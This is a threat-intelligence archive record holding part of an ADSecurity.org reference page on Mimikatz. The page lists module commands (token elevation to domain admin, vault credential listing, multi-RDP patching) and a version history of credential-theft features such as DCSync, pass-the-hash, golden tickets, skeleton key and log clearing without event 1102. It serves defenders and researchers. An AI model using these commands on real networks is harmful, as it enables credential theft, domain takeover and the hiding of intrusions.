Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box using the Windows API.\r\nRequires Administrator rights.\r\nFind a domain admin credential on the box and use that token: token::elevate /domainadmin\r\nTOKEN::List – list all tokens of the system\r\nTOKEN::Revert – revert to process token\r\nTOKEN::Run – Run\r\nTOKEN::Whoami – Display current identity\r\nTS\r\nTS::MultiRDP – (experimental) Patch Terminal Server service to allow multiple users\r\nTS::Sessions – List TS/RDP sessions.\r\nTS::Remote \r\nVAULT\r\nVAULT::List – list vault credentials\r\nVAULT::Cred – cred\r\nMimikatz Version History\r\nSourced from the Mimikatz release GitHub page\r\nMimikatz 2.1.1 – Release Date: 12/20/2017\r\n2.1.1 20171220\r\nClear event logs without the event log logging 1102 “Event Log Cleared”\r\nMimikatz 2.1.1 – Release Date: 12/19/2017\r\n2.1.1 20171219\r\nMimikatz 2.1.1 – Release Date: 12/18/2017\r\n2.1.1 20171218\r\nmimidrv updated for Windows 10 version 1709 (x64)\r\nMimikatz 2.1.1 – Release Date: 11/28/2017\r\n2.1.1 20171128\r\nMimikatz 2.1.1 – Release Date: 11/06/2017\r\n2.1.1 20171106\r\n[fix #107] remove _vscwprintf dependency with mimilove on Windows 2000\r\n[credits] with his work on AD, Vincent Le Toux (@vletoux) is starring as co-author 🙂\r\n[internal] DRSR RPC\r\n[fix] dcsync export as CSV without junk chars between username and NTLM hash\r\nMimikatz 2.1.1 – Release Date: 08/13/2017\r\n2.1.1 20170813\r\ncrypto::extract now supports CAPI \u0026 BCrypt (RSA/AES/DES/3DES/DESX/RC4/RC2…)\r\n[new] lsadump::changentlm to *change* user password/hash to another password/hash\r\n…\r\nMimikatz Release Date: 6/06/2016\r\n2.1 alpha 20160506.1 (oe.eo) edition\r\n[remove] mimikatz lsadump::dcsync req v10 \u0026 rep v9\r\n[future fix] mimikatz lsadump::dcsync 
pDrsExtensionsInt-\u003edwExtCaps = MAXDWORD32\r\nMimikatz Release Date: 6/06/2016\r\n2.1 alpha 20160606 (oe.eo) edition\r\n[fix #47] mimikatz lsadump::dcsync ‘Fun with flags’ to support AD Privileged Access Management in 2016 TP5 (req v10 \u0026 rep v9)\r\nMimikatz Release Date: 6/04/2016\r\n2.1 alpha 20160604 (oe.eo) edition\r\n[fix #46] MSV structure alignment for Windows 10 \u003e LTSB (LSAISo \u0026 normal)\r\n[enhancement] SID/Name lookup \u0026 LDAP query now with system arg (not only local/current domain)\r\nMimikatz Release Date: 6/01/2016\r\n2.1 alpha 20160601 (oe.eo) edition\r\n[fix] mimikatz lsadump::dcsync now supports AD with recycle bin enabled (thanks to Marcus Rath for the report)\r\nMimikatz Release Date: 5/25/2016\r\n2.1 alpha 20160525 (oe.eo) edition\r\nlsadump::netsync to ask a DC to send current and previous NTLM hash of DC/SRV/WKS\r\nLots of thanks to @asolino for his help!\r\nMimikatz Release Date: 5/22/2016\r\n2.1 alpha 20160522 (oe.eo) edition\r\n[fix #39] Removing 2 bytes of alignment when using LSAIso with MSV\r\nMimikatz Release Date: 5/06/2016\r\n2.1 alpha 20160506 (oe.eo) edition\r\n[fix #36] Replace wcsicmp by _wcsicmp to avoid warnings with modern VS\r\nNew SID module\r\n[remove] misc::addsid\r\n[new] sid:: module, to lookup, query, modify, add… (2003/2008r2/2012r2 right now)\r\nMimikatz Release Date: 4/30/2016\r\n2.1 alpha 20160501 (oe.eo) edition\r\n[close #35] DCSync works with renamed domains\r\nThanks to @rmbolger \u0026 @MichaelGrafnetter, DCSync now deals with msDS-ReplicationEpoch / dwReplEpoch\r\nMimikatz Release Date: 3/27/2016\r\n2.1 alpha 20160327 (oe.eo) edition\r\nWelcome to Windows 10 LTSB \u0026 current\r\n[remove] mimidrv \u0026 mimikatz kernel module: Process \u0026 Object callbacks remover are no longer in the program\r\n[internal] Windows 10 is now split into 1507 (LTSB) and 1511 (current)\r\n[internal] mimidrv: Windows 10 support added\r\n[internal] 
mimilib WinDBG module \u0026 mimikatz::sekurlsa: Windows 10 MSV / Kerberos Tickets are no longer specific (offsets table)\r\n[internal] Using KULL_M_MEMORY_GLOBAL_OWN_HANDLE instead of a local variable in each function\r\nMimikatz Release Date: 2/29/2016\r\n2.1 alpha 20160229 (oe.eo) edition\r\nSystem Environment Variables \u0026 other stuff\r\n[new] System Environment Variables user module\r\n[new] System Environment Variables kernel IOCTL for Set\r\n[enhancement] privilege::sysenv\r\n[enhancement] Busylight\r\n[enhancement] misc::skeleton can avoid anti-AES patching for aware clients with /letaes\r\nMimikatz Release Date: 2/17/2016\r\n2.1 alpha 20160217 (oe.eo) edition\r\n[new] crypto::certificates /silent \u0026 /nokey flags\r\n[new] crypto::keys /silent flag\r\n[new] kull_m_busylight module now supports the protocol for new devices\r\nMimikatz Release Date: 2/07/2016\r\nSome DPAPI stuff\r\n[new] vault module now handles more Vault types, Attributes and Properties (with /attributes)\r\n[new] misc::compressme to create a compressed version of mimikatz\r\n[new] dpapi::cred now handles legacy (NT5) multiple credentials\r\n[new] dpapi::wifi \u0026 dpapi::wwan to deal with network profiles\r\n[internal] kuhl_m_vault: vault::list now deals with SID / credentials attributes (with one incorrect align.)\r\n[internal] kull_m_string: removed unused kull_m_string_suspectUnicodeStringStructure\r\n[internal] kull_m_string: added kull_m_string_printSuspectUnicodeString\r\n[internal] kull_m_string: added dirty kull_m_string_quickxml_simplefind\r\n[internal] kull_m_memory: quick compress \u0026 decompress routines\r\n[internal] kull_m_dpapi: added blob flags descriptions\r\n[internal] kull_m_dpapi: fixed blob protection flags description for system\r\n[internal] kull_m_dpapi: removed unused kull_m_dpapi_unprotect_backupkey_with_secret\r\n[internal] kull_m_cred: added legacy (NT5) credentials structures \u0026 
routines\r\nMimikatz Release Date: 1/31/2016\r\nLots of internals and 2003 SP1 support\r\n[new] sekurlsa module and its kerberos submodule now work with old 2003 SP1 (live or dump)\r\n[remove] misc::wifi with WLanAPI will be replaced with dpapi::wifi raw access\r\n[fix] crypto::certificate buffer free at the right place\r\n[internal] new kull_m_file Find function with callback\r\n[internal] removed kull_m_file functions (read/write/file exist) with environment-variables, now used for all command-lines\r\n[internal] kull_m_crypto_hash better checks for CRC32 trick\r\n[internal] mimilove for Windows 2000 banner update\r\n[internal] crypto::system now works with buffers (for future registry access)\r\n[internal] kerberos::ptt \u0026 crypto::system call kull_m_file_Find instead of their own implementation\r\n[internal] remove CrtlHandler, from mimikatz main modules, when exiting to let PowerShell clean\r\n[internal] expand command lines environment-variables from mimikatz main modules\r\nMimikatz Release Date: 1/16/2016\r\nCrypto, crypto everywhere…\r\n[new] crypto::providers and crypto::certificates now list provider types\r\n[internal] Removed kull_m_crypto_crc32 routine from crypto module, relies now on cryptdll using CALG_CRC32 with kull_m_crypto_hash\r\n[internal] Removed incorrect usage of BOOL instead of NTSTATUS in kuhl_m_pac_validationInfo_to_PAC\r\nMimikatz Release Date: 1/11/2016\r\nCrypto \u0026 Kerberos enhancements\r\n[fix] dpapi::capi now deals with AT_SIGNATURE keys\r\n[fix] sekurlsa::kerberos / kerberos:: encryption type are now signed\r\n[new] kerberos::ask to ask / save TGS from current TGT\r\n[new] crypto::system to describe/to export Windows System Certificate (cert, crl, ctl, keyid)\r\n[internal] smaller banner for smaller displays\r\n[internal] Copyrights for 2016\r\n[internal] kull_m_file can deal with environment-variable strings in paths\r\n[internal] kull_m_crypto new types for 
CERT_PROP_*_ID.\r\nMimikatz Release Date: 1/05/2016\r\nMSV \u0026 Kerberos fixes, LSA and Privilege enhancements\r\n[fix] sekurlsa::msv \u0026 mimilib for Windows 10 build 10586\r\n[fix #20] sekurlsa::tickets (display \u0026 export) for NT 6 != Windows 10\r\n[close #16] kerberos::golden now with ~NetBios name in LogonDomainName field of the PAC\r\n[new] privilege module shortcuts (driver, security, tcb, backup, restore) and functions (by id or name)\r\n[new] lsadump::dcsync and lsadump::lsa /inject ‘NTLM-Strong-NTOWF’ in Supplemental Credentials structures (Windows 2016 TP 4)\r\n[internal] NtSetSystemInformation can now be used in code\r\nMimikatz Release Date: 11/12/2015\r\nmimikatz \u0026 mimilib sekurlsa module ready for Windows 10 build 10586\r\nMimikatz Release Date: 11/09/2015\r\nmimikatz: updated to build with hid.lib\r\nMimikatz Release Date: 10/08/2015\r\nKiwi \u0026 René Coty BusyLight mode\r\nMimikatz Release Date: 10/04/2015\r\nmimikatz + mimilib sekurlsa fix for SmartCard information\r\nMimikatz Release Date: 9/29/2015\r\nsekurlsa::kerberos – Fix SmartCard pin code\r\nMimikatz Release Date: 9/26/2015\r\nsekurlsa::pth Auto-impersonation (/impersonate)\r\nMimikatz Release Date: 9/16/2015\r\nlsadump::dcsync fix for 2012r2 AD Recycle Bin\r\nThank you to @asolino, @mubix \u0026 @carnal0wnage!\r\nMimikatz Release Date: 9/06/2015\r\nEnhancements\r\n* Code cleaning\r\nMimikatz Release Date: 9/01/2015\r\nkerberos::golden: fix for groups printing.\r\nlsadump::dcsync autoselects a domain controller with Directory Service (DIRECTORY_SERVICE)\r\nMimikatz Release Date: 8/30/2015\r\nCleaning \u0026 few Win10 adaptations\r\nMimikatz Release Date: 8/25/2015\r\nLicence fix on one missed file by AnkhSVN 😉\r\nGlobal licence update, credits to Vincent LE TOUX for DCSync, and lsadump::hash moved to crypto::hash\r\nThis page and all content Copyright © 2015-2016 Sean Metcalf (ADSecurity.org). 
All Rights Reserved. No\r\nwarranty is implied or provided.\r\nSource: https://adsecurity.org/?page_id=1821",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://adsecurity.org/?page_id=1821"
	],
	"report_names": [
		"?page_id=1821"
	],
	"threat_actors": [],
	"ts_created_at": 1775434026,
	"ts_updated_at": 1775791294,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/dc49dc8138e64eca0a4774053cc9b3c3244adf43.pdf",
		"text": "https://archive.orkl.eu/dc49dc8138e64eca0a4774053cc9b3c3244adf43.txt",
		"img": "https://archive.orkl.eu/dc49dc8138e64eca0a4774053cc9b3c3244adf43.jpg"
	}
}